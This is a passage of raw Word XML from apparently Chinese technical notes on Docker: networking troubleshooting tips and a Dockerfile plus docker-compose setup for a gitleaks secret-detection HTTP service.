        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>docker network create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令创建一个新的网络，然后使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项运行你的容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E3F08" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D4F284" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整防火墙规则：如果你的主机上运行有防火墙，可能需要调整防火墙规则以允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>容器访问内网。具体的步骤取决于你的防火墙软件和配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58689F46" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B31ACB" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRPr="007342F5" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>配置：如果你的问题与</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解析有关，可能需要检查和调整你的</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容器的</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>配置。你可以通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>守护进程的配置文件（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/docker/daemon.json</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> dns </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>选项来全局配置</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，也可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --dns </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>选项在运行容器时指定</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217B9D6" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRPr="007342F5" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC455F5" w14:textId="1555DEB0" w:rsidR="00E35F0E" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>：如果你的内网服务在</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>后面，你可能需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>容器中设置</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。这可能需要在你的</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>镜像中安装和配置</w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> VPN </w:t>
      </w:r>
      <w:r w:rsidRPr="007342F5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A6DC9C" w14:textId="77777777" w:rsidR="00E35F0E" w:rsidRPr="00CC3622" w:rsidRDefault="00E35F0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1580163B" w14:textId="3CA290A4" w:rsidR="00360B8E" w:rsidRDefault="007A168F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="_Toc159779592"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络的优势</w:t>
      </w:r>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="0F8BA903" w14:textId="77777777" w:rsidR="007A168F" w:rsidRDefault="007A168F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A47A7DB" w14:textId="12612B61" w:rsidR="007A168F" w:rsidRPr="007A168F" w:rsidRDefault="007A168F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>网络中的容器之间可以使用容器名进行网络通信，就像访问域名一样。这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认提供了一个内置的</w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="007A168F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>服务，它会为在同一网络中运行的容器分配主机名，并且其他容器可以使用这些主机名进行通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763394F1" w14:textId="77777777" w:rsidR="007A168F" w:rsidRDefault="007A168F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551B7B99" w14:textId="15CE6FB6" w:rsidR="006F3DDA" w:rsidRDefault="006F3DDA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc159779593"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+docker</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>itleaks-Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
    </w:p>
    <w:p w14:paraId="2BA050B7" w14:textId="05BD6F23" w:rsidR="006F3DDA" w:rsidRDefault="006F3DDA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5D3D9F" w14:textId="3DB8F8A5" w:rsidR="005B2D1A" w:rsidRDefault="005B2D1A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个一块儿用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>-compose.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61922774" w14:textId="3C5E90E6" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc159779594"/>
      <w:r w:rsidRPr="00BE4861">
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="10B7579D" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5868FD8F" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>FROM amd64/alpine:3.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED44C96" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418AF713" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>RUN apk update &amp;&amp; apk add git &amp;&amp; apk add tzdata &amp;&amp; cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime &amp;&amp; echo "Asia/Shanghai" &gt; /etc/timezone &amp;&amp; apk del tzdata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3572EA" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C863AC6" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ADD ./SecretDetectionDir /webscan/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64898782" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B206E4E" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>WORKDIR /webscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76346546" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531E1E72" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>EXPOSE 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4582EA88" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC5A834" w14:textId="4A6C4B8E" w:rsidR="006F3DDA" w:rsidRPr="006F3DDA" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ENTRYPOINT ["/webscan/http"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E0CC0" w14:textId="73B67DA6" w:rsidR="006F3DDA" w:rsidRDefault="006F3DDA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFF3042" w14:textId="093AE969" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc159779595"/>
      <w:r w:rsidRPr="00BE4861">
        <w:t>docker-compose.yaml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="58DC9888" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AE4003" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>version: "3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA9265" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F2EB2" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  secretdetection_docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081F1BD7" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    build: .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7BAAEC" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    container_name: secretdetection_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F58F2D5" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326899B7" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      - "8000:8000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDCE21" w14:textId="77777777" w:rsidR="00BE4861" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3388FDD6" w14:textId="6539C138" w:rsidR="006F3DDA" w:rsidRDefault="00BE4861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE85540" w14:textId="75273D8D" w:rsidR="006F3DDA" w:rsidRDefault="006F3DDA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE3FABE" w14:textId="476DBA58" w:rsidR="00F704AC" w:rsidRDefault="001C0634" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc159779596"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>纯</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:t>-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：构建</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:t>itleaks-Docker</w:t>
      </w:r>
      <w:r w:rsidR="00F704AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="7D713DE9" w14:textId="7C60FEDD" w:rsidR="00F704AC" w:rsidRDefault="00F704AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="301E61CB" w14:textId="6E9E834F" w:rsidR="00F704AC" w:rsidRDefault="001C0634" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>-compose+Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组合之后，我想写个</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>纯</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无</w:t>
      </w:r>
      <w:r w:rsidRPr="001C0634">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52206E20" w14:textId="553BEA1C" w:rsidR="001C0634" w:rsidRDefault="001C0634" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完全替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76910850" w14:textId="34A8A34F" w:rsidR="001C0634" w:rsidRDefault="001C0634" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448DE990" w14:textId="0C3EFFA4" w:rsidR="004E2B19" w:rsidRDefault="0048028E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc159779597"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
